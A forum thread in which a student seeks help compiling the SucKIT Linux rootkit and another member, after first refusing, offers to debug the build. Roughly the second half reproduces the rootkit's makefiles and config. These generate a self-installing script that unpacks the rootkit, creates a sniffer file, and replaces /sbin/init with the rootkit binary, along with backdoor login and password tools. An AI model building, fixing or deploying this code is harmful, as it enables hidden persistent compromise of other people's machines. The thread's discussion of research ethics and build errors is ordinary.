Rootkit Help

[jshmo]

Hi,
I am currently working understanding the SUCKIT rootkit for a research project, not for malicious use. Unfortunately, I can't get it to compile to further my research because I am getting the error "undefined reference to 'read' " and other system calls. I checked to make sure that the necessary headers are included and they are. I don't think I need to install anything for Ubuntu 9.04 for c programming because I tried a simpler program first and it worked fine. Does any one have any suggestions?
Thanks.

[Rubberman]

People working on malware have no reasonable expectation of help here. JMHO... In any case, even if it is for "research" (remember what happed with the Morris worm back in the 80's - a research project that inadvertently got into the wild), if you cannot debug your build environment and the code you are trying to use, then you aren't qualified for this work. If you do succeed in building this rootkit, you and others are likely to "enjoy" unanticipated "benefits".

[Rubberman]

Speaking of unanticipated results from a programming project, here's one that effectively shut down a billion $ company's network, and in that case there was no intent on building/distributing malware. Some engineers in my company's Korean division built some network communication software that used the commercial TIBCO Rendevous message bus. Unfortunately, in their error recovery code there was a bug that would result in a ramping volume of network-wide broadcast messages, resulting in what was in effect a denial of service attack on the network. Every few days, this code would have the bad error handling function triggered, and in an hour or so the entire network would be shut down until the offending servers were rebooted. The trigger was a client being shut down without disconnecting from the service - the result of a 3-finger salute when the client system would seem to take too long in getting the results of a transaction request. Needless to say, our major customers who were using this code weren't very happy - shutting down a semiconductor plant runs into losses of million$ per hour. Caveate developer!

[jshmo]

First of all you don't know who reads these forums because turns out you don't know everything. Get off your high horse and share some knowledge with others. You shouldn't assume that you know what you're talking about because it turns out you don't know everything. I am working on a laptop that cannot connect to the Internet on purpose. I figure I could destroy the operating system on that computer without risk to the world. But I thank you for thinking less of me because I have never actually used a makefile before and was looking for a bit of help. As for your comment about unexpected results, that would be great because lots of things that you enjoy today have come from unexpected results like post it notes. Have fun criticising others who are interested in learning and are not at your expertise yet...Thanks for Nothing

[Rubberman]

I'm just saying that there is a certain basic level of understanding required for the sort of "research" you say you want to persue. Because of the fundamentally elementary level of problems you are experiencing, it is only natural that I assume you don't have the requisite knowledge yet to persue this endeavor. I stand by this, and don't expect help from me until you can "bootstrap" yourself to a bit better ability to build/run software on Linux/Unix systems.

[jshmo]

its not "research" its research. I have a professor as my mentor who is not much help on this. I mean I think that I have a basic understanding of how to build and run software. My real issue is that I'm using a makefile I did not create and encountering the "undefined reference" error I stated before and I was hoping that someone who wasn't so arrogant would help a struggling college student get a good grade but whatever ill do it myself. By the way how can I learn something specific if people like you refuse to enlighten me.

[Rubberman]

Well, let's just get down to the basics of building/linking software, and leave the "hot button" issue of research into rootkits out of the conversation then, ok?

When the linker complains about missing symbols such as read, write, etc it means that the LDFLAGS makefile variable is likely missing a library directive. These functions are usually found in the libc library which should be automatically linked, but it is possible that the makefile is constructed such that it is not being linked properly, or at all. To help with this, please attach the makefile here and I'll see what I can tell you how to fix it.

[Rubberman]

Also, please provide information about the distribution+version of Linux you are running, such as Ubuntu 9.04, as well as the version of gcc you are using. You can get the gcc version information with the command: gcc --version

[Rubberman]

Also, I apologize for my initial attitude. However, your initial posting led me to believe that you were a "script kiddie" or similar looking for help, and that's not something I am particularly keen about doing.

[jshmo]

yea i guess i gave that impression but that is definately not my intention. i'm actually trying to figure out how to prevent such rootkits from attacking a linux computer. But anyway, the make file is below and the version of gcc is 4.3.3. im not sure if this makes a difference but i saw in the code of the rootkit that the author tries to replace libc or at least modify it for his own code. Could this be a potential problem if the real libc and the fake one are not both linked to the file. Ive already looked at my .bashrc file and i'm pretty sure that i dont have to add a path for the libraries on my computer because i was able to compile the short hello world c program. The first make file is the one in the parent folder and the second is the one in the source code folder. Ive also included the configure file that it says its calls. within the makefiles, it creates a script so that a person can upload it to the target computer so there are some extra instructions. I really appreciate your help with this.

Parent makefile:
#
# $Id: Makefile, just a makefile, whatever
# Btw, if you have any idea on how to prove that, drop me a line.
# You see ... I'm really not a make guru
# -sd

include config

INST = inst

all: install

help:
@echo "Targets:"
@echo "make sk - build sk & login binary"
@echo "make help - this help"
@echo "make skconfig - configure sk"
@echo "make install - create install script"

install:include/config.h sk
@echo "Creating install script"
echo "#!/bin/bash" > $(INST)
echo "D=`cat include/config.h | grep HOME | awk {'print $$3'}`" >> $(INST)
echo "H=`cat include/config.h | grep HIDESTR | awk {'print $$3'}`" >> $(INST)
echo "mkdir -p \$$D; cd \$$D" >> $(INST)
echo "echo > .sniffer; chmod 0622 .sniffer" >> $(INST)
echo "echo -n -e `gzip -9 -c sk | src/bin2oct` | gzip -d > sk" >> $(INST)
echo "chmod 0755 sk; if [ ! -f /sbin/init\$${H} ]; " \
"then cp -f /sbin/init /sbin/init\$${H}; fi;" \
"rm -f /sbin/init; cp sk /sbin/init" >> $(INST)
@echo "echo Your home is \$$D, go there and type ./sk to install" >> $(INST)
@echo "echo us into memory. Have fun!" >> $(INST)
@echo
@echo "Okay, file '$(INST)' is complete, self-installing script."
@echo "Just upload it somewhere, execute and you could log in using"
@echo "./login binary."
@echo
@echo "Have fun!"

skconfig: clean src/pass
@clear
@src/pass >> include/config.h
@echo
@echo "Configuration saved."
@echo "From now, _only_ this configuration will be used by generated"
@echo "binaries till you do skconfig again."
@echo
@echo "To (re)build all of stuff type 'make'"

include/config.h:
@echo
@echo Please do \`make skconfig\` in top level directory to generate configuration file.
@echo
@exit 1

sk: include/config.h src/sk src/bin2oct login
cp -f src/sk sk

login: src/login
cp -f src/login login

src/sk: src include
@(make -C $(SRC) )

src/login: src include
@(make -C $(SRC) login)

src/pass: src include
@(make -C $(SRC) pass)

src/bin2oct: src include
@(make -C $(SRC) bin2oct)

clean:
rm -f include/config.h sk login inst
@(make -C $(SRC) clean )


source makefile:
#
# $Id: Makefile, just a makefile, whatever
# Btw, if you have any idea on how to prove that, drop me a line.
# You see ... I'm really not a make guru
# -sd

include ../config

all: login pass
rm -f sk kernel.o
make sk

obj: ../include/config.h $(OBJS)
@if test -z "$(OBJS)"; then make obj OBJS="`echo [^z]*.c | sed 's/\.c/.o/g'`";fi;

../include/config.h:
@echo
@echo Please do \`make skconfig\` in top level directory to generate configuration file.
@echo
@exit 1

sk: obj
gcc -s -nostdlib *.o -o sk

kernel.o:
@echo ".data" > kernel.s
@echo "kernel_start:" >> kernel.s
gcc -S $(CFLAGS) kernel.c -o - | grep -vE "\.align|\.p2align|\.text|\.data|\.rodata|#|\.iden t|\.file|\.version" >> kernel.s
@echo "kernel_end:" >> kernel.s
gcc -c kernel.s

login: zlogin.c sha1.o crypto.o
$(CC) $(CFLAGS) $(LDFLAGS) zlogin.c sha1.o crypto.o -o login

pass: zpass.c sha1.o crypto.o
$(CC) $(CFLAGS) $(LDFLAGS) zpass.c sha1.o crypto.o -o pass

bin2oct:zbin2oct.c
$(CC) $(CFLAGS) $(LDFLAGS) zbin2oct.c -o bin2oct

clean:
@(rm -f *.o sk login *.s core pass bin2oct)

configure file:

#
# $Id: config, common config for all makefiles
#

#escape character - ^K by default
ECHAR = 0x0b

#directories
INCLUDE = include
SRC = src
VER = 1.3a

#files
BINARY = sk

#compile flags
CC = gcc
LD = ld
CFLAGS = -Wall -O2 -fno-unroll-all-loops \
-I../$(INCLUDE) -I../$(ARCH) -DECHAR=$(ECHAR)
LDFLAGS = -s

.c.o:
$(CC) $(CFLAGS) -c $<